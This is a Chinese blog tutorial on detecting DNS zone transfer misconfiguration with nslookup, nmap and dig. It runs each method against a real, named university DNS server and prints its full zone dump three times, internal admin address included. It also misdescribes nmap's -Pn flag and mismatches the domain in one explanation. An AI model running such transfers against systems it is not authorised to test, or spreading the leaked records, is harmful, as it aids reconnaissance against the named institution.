dns 域傳送漏洞利用總結(jié)

DNS分類

最常用的DNS記錄有以下幾類:

A記錄 IP地址記錄,記錄一個(gè)域名對(duì)應(yīng)的IP地址

AAAA記錄  IPv6地址記錄,記錄一個(gè)域名對(duì)應(yīng)的IPv6地址

CNAME記錄   別名記錄,記錄一個(gè)主機(jī)的別名

MX記錄    電子郵件交換記錄,記錄一個(gè)郵件域名對(duì)應(yīng)的IP地址,比如my[at]lijiejie.com
后面的部分lijiejie.com,郵件服務(wù)器對(duì)應(yīng)的IP地址

NS記錄      域名服務(wù)器記錄 ,記錄該域名由哪臺(tái)域名服務(wù)器解析

PTR記錄     反向記錄,也即從IP地址到域名的一條記錄

TXT記錄     記錄域名的相關(guān)文本信息

SOA記錄   start of anthorization 開(kāi)始授權(quán),是一種比較難以理解的記錄值,一般二級(jí)域名才會(huì)有

DNS域傳送

作為重要的互聯(lián)網(wǎng)基礎(chǔ)設(shè)施,難免成為黑客的重點(diǎn)攻擊目標(biāo),服務(wù)的穩(wěn)定性尤為重要。DNS服務(wù)器分為:主服務(wù)器、備份服務(wù)器和緩存服務(wù)器。在主備服務(wù)器之間同步數(shù)據(jù)庫(kù),需要使用“DNS域傳送”。域傳送是指后備服務(wù)器從主服務(wù)器拷貝數(shù)據(jù),并用得到的數(shù)據(jù)更新自身數(shù)據(jù)庫(kù)。

若DNS服務(wù)器配置不當(dāng),可能導(dǎo)致匿名用戶獲取某個(gè)域的所有記錄。造成整個(gè)網(wǎng)絡(luò)的拓?fù)浣Y(jié)構(gòu)泄露給潛在的攻擊者,包括一些安全性較低的內(nèi)部主機(jī),如測(cè)試服務(wù)器。憑借這份網(wǎng)絡(luò)藍(lán)圖,攻擊者可以節(jié)省很少的掃描時(shí)間。

大的互聯(lián)網(wǎng)廠商通常將內(nèi)部網(wǎng)絡(luò)與外部互聯(lián)網(wǎng)隔離開(kāi),一個(gè)重要的手段是使用Private DNS。如果內(nèi)部DNS泄露,將造成極大的安全風(fēng)險(xiǎn)。風(fēng)險(xiǎn)控制不當(dāng)甚至造成整個(gè)內(nèi)部網(wǎng)絡(luò)淪陷。

DNS域傳送漏洞檢測(cè)

常用的三種檢測(cè)方法: nslookup命令, nmap命令, dig命令, 下面將分別演示如何用三種方法檢測(cè)dns域傳送漏洞

利用nslookup命令發(fā)現(xiàn)DNS域傳送命令

C:\Users\lj>nslookup
默認(rèn)服務(wù)器:  UnKnown
Address:  211.82.100.1

> server dns1.thnu.edu.cn
默認(rèn)服務(wù)器:  dns1.thnu.edu.cn
Address:  125.223.168.5

> ls thnu.edu.cn
[dns1.thnu.edu.cn]
 thnu.edu.cn.                   NS     server = dns1.thnu.edu.cn
 admin                          A      172.16.200.11
 admissions                     A      222.160.127.36
 alumni                         A      222.160.127.36
 bwc                            A      222.160.127.36
 cxbd                           A      222.160.127.36
 cxzx                           A      222.160.127.36
 ddh                            A      222.160.127.38
 DNS1                           A      125.223.168.5
 dwb                            A      222.160.127.36
 ggl                            A      222.160.127.36
 gjjl                           A      222.160.127.36
 gjjy                           A      222.160.127.36
 gs                             A      222.160.127.36
 hqc                            A      222.160.127.36
 hxxy                           A      222.160.127.36
 jcc                            A      222.160.127.36
 jcjy                           A      222.160.127.36
 jjc                            A      222.160.127.36
 jjfz                           A      222.160.127.36
 jjw                            A      222.160.127.36
 jky                            A      222.160.127.36
 jsjxy                          A      222.160.127.36
 jwc                            A      222.160.127.36
 jwgl                           A      111.26.184.4
 jxjyxy                         A      222.160.127.36
 jy                             A      47.89.44.34
 jyw                            A      222.160.127.36
 jyx                            A      222.160.127.36
 kyc                            A      222.160.127.36
 kyys                           A      222.160.127.36
 kzfxt                          A      222.160.127.36
 lib                            A      222.160.127.36
 ltx                            A      222.160.127.36
 lxyz                           A      222.160.127.36
 mail                           A      222.160.127.37
 msx                            A      222.160.127.36
 msxy                           A      222.160.127.36
 mzmjms                         A      222.160.127.36
 news                           A      111.26.184.8
 nic                            A      222.160.127.36
 old                            A      222.160.124.253
 pgdata                         A      222.160.127.36
 qzlx                           A      222.160.127.35
 res                            A      222.160.124.242
 rsc                            A      222.160.127.36
 sasc                           A      222.160.127.36
 sdxy                           A      222.160.127.36
 shpg                           A      222.160.127.36
 sjc                            A      222.160.127.36
 sky                            A      222.160.127.36
 skyexam                        A      222.160.127.36
 swx                            A      222.160.127.36
 sxxy                           A      222.160.127.36
 szb                            A      222.160.127.36
 thsywl                         A      222.160.127.36
 tqms                           A      222.160.127.36
 tw                             A      222.160.127.36
 tyxy                           A      222.160.127.36
 tzb                            A      222.160.127.36
 web                            A      222.160.127.36
 www                            A      222.160.127.35
 wxy                            A      222.160.127.36
 wyxy                           A      222.160.127.36
 xb                             A      222.160.127.36
 xcb                            A      222.160.127.36
 xgh                            A      222.160.127.36
 xsc                            A      222.160.127.36
 xssx                           A      222.160.127.36
 xtw                            A      222.160.127.36
 xxgk                           A      222.160.127.36
 yb                             A      222.160.127.36
 yfzx                           A      222.160.127.35
 yyjs                           A      222.160.127.36
 yywz                           A      222.160.127.36
 yyxy                           A      222.160.127.36
 zcc                            A      222.160.127.36
 zf                             A      222.160.127.36
 zgs                            A      222.160.127.36
 zwkfzx                         A      222.160.127.36
 zysp                           A      222.160.127.36
 zzb                            A      222.160.127.36

操作基本的步驟是:

  1. 輸入nslookup命令進(jìn)入交互式shell

  2. Server 命令參數(shù)設(shè)定查詢將要使用的DNS服務(wù)器

  3. Ls命令列出某個(gè)域中的所有域名

攻擊者能獲取的敏感主要包括:

1)網(wǎng)絡(luò)的拓?fù)浣Y(jié)構(gòu),服務(wù)器集中的IP地址段

2)數(shù)據(jù)庫(kù)服務(wù)器的IP地址

3)測(cè)試服務(wù)器的IP地址,

4)VPN服務(wù)器地址泄露

5)其他敏感服務(wù)器

以上示例了存在漏洞的DNS服務(wù)器,若是不存在漏洞的主機(jī),則可能提示錯(cuò)誤Query Refused:

D:\>nslookup
默認(rèn)服務(wù)器:  public1.114dns.com
Address:  114.114.114.114

> server ns.pku.edu.cn
默認(rèn)服務(wù)器:  ns.pku.edu.cn
Address:  202.112.7.13

> ls pku.edu.cn
[ns.pku.edu.cn]
*** 無(wú)法列出域 pku.edu.cn: Query refused
DNS 服務(wù)器拒絕將區(qū)域 pku.edu.cn 傳送到您的計(jì)算機(jī)。如果這不正確,
請(qǐng)檢查 IP 地址 202.112.7.13 的 DNS 服務(wù)器上 pku.edu.cn 的
區(qū)域傳送安全設(shè)置。

使用nmap掃描DNS域傳送泄露漏洞

nmap --script dns-zone-transfer --script-args dns-zone-transfer.domain=thnu.edu.cn -p 53 -Pn dns1.thnu.edu.cn

Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-04 14:24 CST
Nmap scan report for dns1.thnu.edu.cn (125.223.168.5)
Host is up (0.031s latency).

PORT   STATE SERVICE
53/tcp open  domain
| dns-zone-transfer: 
| thnu.edu.cn.             SOA  dns1.thnu.edu.cn. root.thnu.edu.cn.
| thnu.edu.cn.             NS   dns1.thnu.edu.cn.
| thnu.edu.cn.             MX   0 mail.thnu.edu.cn.
| admin.thnu.edu.cn.       A    172.16.200.11
| admissions.thnu.edu.cn.  A    222.160.127.36
| alumni.thnu.edu.cn.      A    222.160.127.36
| bwc.thnu.edu.cn.         A    222.160.127.36
| cxbd.thnu.edu.cn.        A    222.160.127.36
| cxzx.thnu.edu.cn.        A    222.160.127.36
| ddh.thnu.edu.cn.         A    222.160.127.38
| DNS1.thnu.edu.cn.        A    125.223.168.5
| dwb.thnu.edu.cn.         A    222.160.127.36
| ggl.thnu.edu.cn.         A    222.160.127.36
| gjjl.thnu.edu.cn.        A    222.160.127.36
| gjjy.thnu.edu.cn.        A    222.160.127.36
| gs.thnu.edu.cn.          A    222.160.127.36
| hqc.thnu.edu.cn.         A    222.160.127.36
| hxxy.thnu.edu.cn.        A    222.160.127.36
| jcc.thnu.edu.cn.         A    222.160.127.36
| jcjy.thnu.edu.cn.        A    222.160.127.36
| jjc.thnu.edu.cn.         A    222.160.127.36
| jjfz.thnu.edu.cn.        A    222.160.127.36
| jjw.thnu.edu.cn.         A    222.160.127.36
| jky.thnu.edu.cn.         A    222.160.127.36
| jsjxy.thnu.edu.cn.       A    222.160.127.36
| jwc.thnu.edu.cn.         A    222.160.127.36
| jwgl.thnu.edu.cn.        A    111.26.184.4
| jxjyxy.thnu.edu.cn.      A    222.160.127.36
| jy.thnu.edu.cn.          A    47.89.44.34
| jyw.thnu.edu.cn.         A    222.160.127.36
| jyx.thnu.edu.cn.         A    222.160.127.36
| kyc.thnu.edu.cn.         A    222.160.127.36
| kyys.thnu.edu.cn.        A    222.160.127.36
| kzfxt.thnu.edu.cn.       A    222.160.127.36
| lib.thnu.edu.cn.         A    222.160.127.36
| ltx.thnu.edu.cn.         A    222.160.127.36
| lxyz.thnu.edu.cn.        A    222.160.127.36
| mail.thnu.edu.cn.        A    222.160.127.37
| msx.thnu.edu.cn.         A    222.160.127.36
| msxy.thnu.edu.cn.        A    222.160.127.36
| mzmjms.thnu.edu.cn.      A    222.160.127.36
| news.thnu.edu.cn.        A    111.26.184.8
| nic.thnu.edu.cn.         A    222.160.127.36
| old.thnu.edu.cn.         A    222.160.124.253
| pgdata.thnu.edu.cn.      A    222.160.127.36
| qzlx.thnu.edu.cn.        A    222.160.127.35
| res.thnu.edu.cn.         A    222.160.124.242
| rsc.thnu.edu.cn.         A    222.160.127.36
| sasc.thnu.edu.cn.        A    222.160.127.36
| sdxy.thnu.edu.cn.        A    222.160.127.36
| shpg.thnu.edu.cn.        A    222.160.127.36
| sjc.thnu.edu.cn.         A    222.160.127.36
| sky.thnu.edu.cn.         A    222.160.127.36
| skyexam.thnu.edu.cn.     A    222.160.127.36
| swx.thnu.edu.cn.         A    222.160.127.36
| sxxy.thnu.edu.cn.        A    222.160.127.36
| szb.thnu.edu.cn.         A    222.160.127.36
| thsywl.thnu.edu.cn.      A    222.160.127.36
| tqms.thnu.edu.cn.        A    222.160.127.36
| tw.thnu.edu.cn.          A    222.160.127.36
| tyxy.thnu.edu.cn.        A    222.160.127.36
| tzb.thnu.edu.cn.         A    222.160.127.36
| web.thnu.edu.cn.         A    222.160.127.36
| www.thnu.edu.cn.         A    222.160.127.35
| wxy.thnu.edu.cn.         A    222.160.127.36
| wyxy.thnu.edu.cn.        A    222.160.127.36
| xb.thnu.edu.cn.          A    222.160.127.36
| xcb.thnu.edu.cn.         A    222.160.127.36
| xgh.thnu.edu.cn.         A    222.160.127.36
| xsc.thnu.edu.cn.         A    222.160.127.36
| xssx.thnu.edu.cn.        A    222.160.127.36
| xtw.thnu.edu.cn.         A    222.160.127.36
| xxgk.thnu.edu.cn.        A    222.160.127.36
| yb.thnu.edu.cn.          A    222.160.127.36
| yfzx.thnu.edu.cn.        A    222.160.127.35
| yyjs.thnu.edu.cn.        A    222.160.127.36
| yywz.thnu.edu.cn.        A    222.160.127.36
| yyxy.thnu.edu.cn.        A    222.160.127.36
| zcc.thnu.edu.cn.         A    222.160.127.36
| zf.thnu.edu.cn.          A    222.160.127.36
| zgs.thnu.edu.cn.         A    222.160.127.36
| zwkfzx.thnu.edu.cn.      A    222.160.127.36
| zysp.thnu.edu.cn.        A    222.160.127.36
| zzb.thnu.edu.cn.         A    222.160.127.36
|_thnu.edu.cn.             SOA  dns1.thnu.edu.cn. root.thnu.edu.cn.

Nmap done: 1 IP address (1 host up) scanned in 4.79 seconds

對(duì)上述命令命令說(shuō)明如下:

nmap –script dns-zone-transfer表示加載nmap文件夾下的腳本文件dns-zone-transfer.nse,擴(kuò)展名.nse可省略

–script-args dns-zone-transfer.domain=zonetransfer.me向腳本傳遞參數(shù),設(shè)置列出記錄的域是nwpu.edu.cn

-p 53設(shè)置掃描53端口

-Pn:設(shè)置通過(guò)Ping發(fā)現(xiàn)主機(jī)是否存活

利用dig 檢測(cè)dns域傳送漏洞

這里涉及dig 一個(gè)重要的命令axfr:

axfr 是q-type類型的一種: axfr類型是Authoritative Transfer的縮寫(xiě),指請(qǐng)求傳送某個(gè)區(qū)域的全部記錄。

我們只要欺騙dns服務(wù)器發(fā)送一個(gè)axfr請(qǐng)求過(guò)去, 如果該dns服務(wù)器上存在該漏洞,就會(huì)返回所有的解析記錄值

第一步: 找到解析域名的dns服務(wù)器(Server服務(wù)器), 我們可以發(fā)送一個(gè)ns類型解析請(qǐng)求過(guò)去

dig thnu.edu.cn ns

;; ANSWER SECTION:
thnu.edu.cn.        2185    IN  NS  DNS1.thnu.edu.cn.

第二步: 然后向該域名發(fā)送axfr 請(qǐng)求:

?root?~??? dig axfr @dns1.thnu.edu.cn thnu.edu.cn

; <<>> DiG 9.10.3-P4-Debian <<>> axfr @dns1.thnu.edu.cn thnu.edu.cn
; (1 server found)
;; global options: +cmd
thnu.edu.cn.        3600    IN  SOA dns1.thnu.edu.cn. root.thnu.edu.cn. 2017102704 30 30 360 3600
thnu.edu.cn.        3600    IN  NS  dns1.thnu.edu.cn.
thnu.edu.cn.        3600    IN  MX  0 mail.thnu.edu.cn.
admin.thnu.edu.cn.  3600    IN  A   172.16.200.11
admissions.thnu.edu.cn. 3600    IN  A   222.160.127.36
alumni.thnu.edu.cn. 3600    IN  A   222.160.127.36
bwc.thnu.edu.cn.    3600    IN  A   222.160.127.36
cxbd.thnu.edu.cn.   3600    IN  A   222.160.127.36
cxzx.thnu.edu.cn.   3600    IN  A   222.160.127.36
ddh.thnu.edu.cn.    3600    IN  A   222.160.127.38
DNS1.thnu.edu.cn.   3600    IN  A   125.223.168.5
dwb.thnu.edu.cn.    3600    IN  A   222.160.127.36
ggl.thnu.edu.cn.    3600    IN  A   222.160.127.36
gjjl.thnu.edu.cn.   3600    IN  A   222.160.127.36
gjjy.thnu.edu.cn.   3600    IN  A   222.160.127.36
gs.thnu.edu.cn.     3600    IN  A   222.160.127.36
hqc.thnu.edu.cn.    3600    IN  A   222.160.127.36
hxxy.thnu.edu.cn.   3600    IN  A   222.160.127.36
jcc.thnu.edu.cn.    3600    IN  A   222.160.127.36
jcjy.thnu.edu.cn.   3600    IN  A   222.160.127.36
jjc.thnu.edu.cn.    3600    IN  A   222.160.127.36
jjfz.thnu.edu.cn.   3600    IN  A   222.160.127.36
jjw.thnu.edu.cn.    3600    IN  A   222.160.127.36
jky.thnu.edu.cn.    3600    IN  A   222.160.127.36
jsjxy.thnu.edu.cn.  3600    IN  A   222.160.127.36
jwc.thnu.edu.cn.    3600    IN  A   222.160.127.36
jwgl.thnu.edu.cn.   3600    IN  A   111.26.184.4
jxjyxy.thnu.edu.cn. 3600    IN  A   222.160.127.36
jy.thnu.edu.cn.     3600    IN  A   47.89.44.34
jyw.thnu.edu.cn.    3600    IN  A   222.160.127.36
jyx.thnu.edu.cn.    3600    IN  A   222.160.127.36
kyc.thnu.edu.cn.    3600    IN  A   222.160.127.36
kyys.thnu.edu.cn.   3600    IN  A   222.160.127.36
kzfxt.thnu.edu.cn.  3600    IN  A   222.160.127.36
lib.thnu.edu.cn.    3600    IN  A   222.160.127.36
ltx.thnu.edu.cn.    3600    IN  A   222.160.127.36
lxyz.thnu.edu.cn.   3600    IN  A   222.160.127.36
mail.thnu.edu.cn.   3600    IN  A   222.160.127.37
msx.thnu.edu.cn.    3600    IN  A   222.160.127.36
msxy.thnu.edu.cn.   3600    IN  A   222.160.127.36
mzmjms.thnu.edu.cn. 3600    IN  A   222.160.127.36
news.thnu.edu.cn.   3600    IN  A   111.26.184.8
nic.thnu.edu.cn.    3600    IN  A   222.160.127.36
old.thnu.edu.cn.    3600    IN  A   222.160.124.253
pgdata.thnu.edu.cn. 3600    IN  A   222.160.127.36
qzlx.thnu.edu.cn.   3600    IN  A   222.160.127.35
res.thnu.edu.cn.    3600    IN  A   222.160.124.242
rsc.thnu.edu.cn.    3600    IN  A   222.160.127.36
sasc.thnu.edu.cn.   3600    IN  A   222.160.127.36
sdxy.thnu.edu.cn.   3600    IN  A   222.160.127.36
shpg.thnu.edu.cn.   3600    IN  A   222.160.127.36
sjc.thnu.edu.cn.    3600    IN  A   222.160.127.36
sky.thnu.edu.cn.    3600    IN  A   222.160.127.36
skyexam.thnu.edu.cn.    3600    IN  A   222.160.127.36
swx.thnu.edu.cn.    3600    IN  A   222.160.127.36
sxxy.thnu.edu.cn.   3600    IN  A   222.160.127.36
szb.thnu.edu.cn.    3600    IN  A   222.160.127.36
thsywl.thnu.edu.cn. 3600    IN  A   222.160.127.36
tqms.thnu.edu.cn.   3600    IN  A   222.160.127.36
tw.thnu.edu.cn.     3600    IN  A   222.160.127.36
tyxy.thnu.edu.cn.   3600    IN  A   222.160.127.36
tzb.thnu.edu.cn.    3600    IN  A   222.160.127.36
web.thnu.edu.cn.    3600    IN  A   222.160.127.36
www.thnu.edu.cn.    3600    IN  A   222.160.127.35
wxy.thnu.edu.cn.    3600    IN  A   222.160.127.36
wyxy.thnu.edu.cn.   3600    IN  A   222.160.127.36
xb.thnu.edu.cn.     3600    IN  A   222.160.127.36
xcb.thnu.edu.cn.    3600    IN  A   222.160.127.36
xgh.thnu.edu.cn.    3600    IN  A   222.160.127.36
xsc.thnu.edu.cn.    3600    IN  A   222.160.127.36
xssx.thnu.edu.cn.   3600    IN  A   222.160.127.36
xtw.thnu.edu.cn.    3600    IN  A   222.160.127.36
xxgk.thnu.edu.cn.   3600    IN  A   222.160.127.36
yb.thnu.edu.cn.     3600    IN  A   222.160.127.36
yfzx.thnu.edu.cn.   3600    IN  A   222.160.127.35
yyjs.thnu.edu.cn.   3600    IN  A   222.160.127.36
yywz.thnu.edu.cn.   3600    IN  A   222.160.127.36
yyxy.thnu.edu.cn.   3600    IN  A   222.160.127.36
zcc.thnu.edu.cn.    3600    IN  A   222.160.127.36
zf.thnu.edu.cn.     3600    IN  A   222.160.127.36
zgs.thnu.edu.cn.    3600    IN  A   222.160.127.36
zwkfzx.thnu.edu.cn. 3600    IN  A   222.160.127.36
zysp.thnu.edu.cn.   3600    IN  A   222.160.127.36
zzb.thnu.edu.cn.    3600    IN  A   222.160.127.36
thnu.edu.cn.        3600    IN  SOA dns1.thnu.edu.cn. root.thnu.edu.cn. 2017102704 30 30 360 3600
;; Query time: 43 msec
;; SERVER: 125.223.168.5#53(125.223.168.5)
;; WHEN: Sat Nov 04 14:12:57 CST 2017
;; XFR size: 85 records (messages 1, bytes 1819)

參考: http://www.lijiejie.com/?s=dns&submit=Search

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書(shū)系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • 1. 概述 在網(wǎng)絡(luò)環(huán)境中一般用戶只需要在瀏覽器中輸入url如www.sunny.com就可以到對(duì)應(yīng)服務(wù)器獲取相應(yīng)的...
    ghbsunny閱讀 3,404評(píng)論 0 7
  • DNS簡(jiǎn)介DNS解析關(guān)鍵概念BIND 一、DNS簡(jiǎn)介: (一)DNS服務(wù) DNS:Domain Name Serv...
    哈嘍別樣閱讀 1,888評(píng)論 0 2
  • @@@時(shí)間 2013-12-24 14:50:00** 博客園-原創(chuàng)精華區(qū) 原文 http://www.cn...
    蘇文星閱讀 1,500評(píng)論 0 7
  • DNS(Domain Name System,域名系統(tǒng)),因特網(wǎng)上作為域名和IP地址相互映射的一個(gè)分布式數(shù)據(jù)庫(kù),能...
    一直在努力hard閱讀 4,803評(píng)論 3 19
  • 古人真是會(huì)說(shuō)話呀,三言兩語(yǔ),寥寥數(shù)字,不得不服。高中的時(shí)候,喜歡拿一個(gè)小本子背古詩(shī)古文,總有一些句子是打著五角星符...
    李氏肆爺閱讀 525評(píng)論 3 0

友情鏈接更多精彩內(nèi)容